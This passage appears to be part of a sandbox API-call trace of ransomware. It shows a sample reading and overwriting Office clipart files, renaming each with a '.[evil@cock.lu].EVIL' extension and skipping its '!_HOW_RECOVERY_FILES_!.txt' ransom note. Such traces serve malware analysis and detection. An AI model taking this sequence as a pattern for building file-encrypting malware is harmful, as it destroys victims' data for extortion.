Office\\root\\CLIPART\\PUB60COR\\SL00712_.WMF") returned 0x45 [0168.011] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00712_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00712_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0168.013] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1db8, lpOverlapped=0x0) returned 1 [0168.022] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.022] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.022] _errno () returned 0x84b1160840 [0168.022] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0168.022] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x1dc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1dc0, lpOverlapped=0x0) returned 1 [0168.023] CloseHandle (hObject=0x1a8) returned 1 [0168.023] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00712_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0168.023] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0168.023] __uncaught_exception () returned 0x84b1160800 [0168.023] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0168.023] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00712_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00712_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00712_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00712_.wmf.[evil@cock.lu].evil")) returned 1 [0168.024] ??_V@YAXPEAX@Z () returned 0x1 [0168.028] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00712_.WMF", dwFileAttributes=0x200) returned 0 [0168.028] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0168.028] wcsstr (_Str="SL01040_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0168.028] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01040_.WMF") returned 69 [0168.028] wcscmp (_String1="SL01040_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0168.028] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SL01040_.WMF") returned 0x0 [0168.028] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01040_.WMF") returned 0x45 [0168.028] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01040_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl01040_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0168.031] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xcdc, lpOverlapped=0x0) returned 1 [0168.039] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.039] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.039] _errno () returned 0x84b1160840 [0168.039] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0168.039] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0xce0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xce0, lpOverlapped=0x0) returned 1 [0168.039] CloseHandle (hObject=0x1a8) returned 1 [0168.040] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01040_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0168.040] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0168.040] __uncaught_exception () returned 0x84b1160800 [0168.040] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0168.040] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01040_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl01040_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01040_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl01040_.wmf.[evil@cock.lu].evil")) returned 1 [0168.041] ??_V@YAXPEAX@Z () returned 0x1 [0168.044] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01040_.WMF", dwFileAttributes=0x200) returned 0 [0168.045] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0168.045] wcsstr (_Str="SL01041_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0168.045] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01041_.WMF") returned 69 [0168.045] wcscmp (_String1="SL01041_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0168.045] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SL01041_.WMF") returned 0x0 [0168.045] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01041_.WMF") returned 0x45 [0168.045] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01041_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl01041_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0168.046] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x60c, lpOverlapped=0x0) returned 1 [0168.054] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.054] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.054] _errno () returned 0x84b1160840 [0168.054] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0168.054] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x620, lpOverlapped=0x0) returned 1 [0168.054] CloseHandle (hObject=0x1a8) returned 1 [0168.055] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01041_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0168.055] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0168.055] __uncaught_exception () returned 0x84b1160800 [0168.055] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0168.055] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01041_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl01041_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01041_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl01041_.wmf.[evil@cock.lu].evil")) returned 1 [0168.056] ??_V@YAXPEAX@Z () returned 0x1 [0168.059] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01041_.WMF", dwFileAttributes=0x200) returned 0 [0168.060] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0168.060] wcsstr (_Str="SL01394_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0168.060] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01394_.WMF") returned 69 [0168.060] wcscmp (_String1="SL01394_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0168.060] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SL01394_.WMF") returned 0x0 [0168.060] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01394_.WMF") returned 0x45 [0168.060] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01394_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl01394_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0168.062] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1b04, lpOverlapped=0x0) returned 1 [0168.069] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.069] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.069] _errno () returned 0x84b1160840 [0168.069] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0168.069] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x1b20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1b20, lpOverlapped=0x0) returned 1 [0168.069] CloseHandle (hObject=0x1a8) returned 1 [0168.070] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01394_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0168.070] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0168.070] __uncaught_exception () returned 0x84b1160800 [0168.070] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0168.070] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01394_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl01394_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01394_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl01394_.wmf.[evil@cock.lu].evil")) returned 1 [0168.071] ??_V@YAXPEAX@Z () returned 0x1 [0168.074] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01394_.WMF", dwFileAttributes=0x200) returned 0 [0168.074] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0168.074] wcsstr (_Str="SL01395_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0168.074] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01395_.WMF") returned 69 [0168.074] wcscmp (_String1="SL01395_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0168.074] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SL01395_.WMF") returned 0x0 [0168.074] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01395_.WMF") returned 0x45 [0168.074] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01395_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl01395_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0168.077] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x138c, lpOverlapped=0x0) returned 1 [0168.083] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.083] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.083] _errno () returned 0x84b1160840 [0168.083] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0168.083] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x13a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x13a0, lpOverlapped=0x0) returned 1 [0168.083] CloseHandle (hObject=0x1a8) returned 1 [0168.083] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01395_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0168.084] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0168.084] __uncaught_exception () returned 0x84b1160800 [0168.084] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0168.084] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01395_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl01395_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01395_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl01395_.wmf.[evil@cock.lu].evil")) returned 1 [0168.085] ??_V@YAXPEAX@Z () returned 0x1 [0168.087] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01395_.WMF", dwFileAttributes=0x200) returned 0 [0168.087] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0168.088] wcsstr (_Str="SL01565_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0168.088] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01565_.WMF") returned 69 [0168.088] wcscmp (_String1="SL01565_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0168.088] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SL01565_.WMF") returned 0x0 [0168.088] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01565_.WMF") returned 0x45 [0168.088] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01565_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl01565_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0168.089] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x6cc4, lpOverlapped=0x0) returned 1 [0168.097] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.097] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.097] _errno () returned 0x84b1160840 [0168.097] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0168.097] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x6ce0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6ce0, lpOverlapped=0x0) returned 1 [0168.097] CloseHandle (hObject=0x1a8) returned 1 [0168.097] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01565_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0168.098] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0168.098] __uncaught_exception () returned 0x84b1160800 [0168.098] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0168.098] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01565_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl01565_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01565_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl01565_.wmf.[evil@cock.lu].evil")) returned 1 [0168.099] ??_V@YAXPEAX@Z () returned 0x1 [0168.102] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01565_.WMF", dwFileAttributes=0x200) returned 0 [0168.103] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0168.103] wcsstr (_Str="SO00017_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0168.103] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00017_.WMF") returned 69 [0168.103] wcscmp (_String1="SO00017_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0168.103] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00017_.WMF") returned 0x0 [0168.103] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00017_.WMF") returned 0x45 [0168.103] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00017_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00017_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0168.105] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x36aa, lpOverlapped=0x0) returned 1 [0168.233] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.233] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.233] _errno () returned 0x84b1160840 [0168.233] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0168.233] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x36c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x36c0, lpOverlapped=0x0) returned 1 [0168.233] CloseHandle (hObject=0x1a8) returned 1 [0168.233] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00017_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0168.233] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0168.234] __uncaught_exception () returned 0x84b1160800 [0168.234] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0168.234] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00017_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00017_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00017_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00017_.wmf.[evil@cock.lu].evil")) returned 1 [0168.235] ??_V@YAXPEAX@Z () returned 0x1 [0168.237] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00017_.WMF", dwFileAttributes=0x200) returned 0 [0168.238] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0168.238] wcsstr (_Str="SO00018_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0168.238] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00018_.WMF") returned 69 [0168.238] wcscmp (_String1="SO00018_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0168.238] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00018_.WMF") returned 0x0 [0168.238] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00018_.WMF") returned 0x45 [0168.238] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00018_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00018_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0168.240] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x32f6, lpOverlapped=0x0) returned 1 [0168.246] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.247] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.247] _errno () returned 0x84b1160840 [0168.247] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0168.247] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x3300, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3300, lpOverlapped=0x0) returned 1 [0168.247] CloseHandle (hObject=0x1a8) returned 1 [0168.247] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00018_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0168.247] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0168.247] __uncaught_exception () returned 0x84b1160800 [0168.247] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0168.248] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00018_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00018_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00018_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00018_.wmf.[evil@cock.lu].evil")) returned 1 [0168.249] ??_V@YAXPEAX@Z () returned 0x1 [0168.251] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00018_.WMF", dwFileAttributes=0x200) returned 0 [0168.252] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0168.252] wcsstr (_Str="SO00152_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0168.252] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00152_.WMF") returned 69 [0168.252] wcscmp (_String1="SO00152_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0168.252] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00152_.WMF") returned 0x0 [0168.252] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00152_.WMF") returned 0x45 [0168.252] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00152_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00152_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 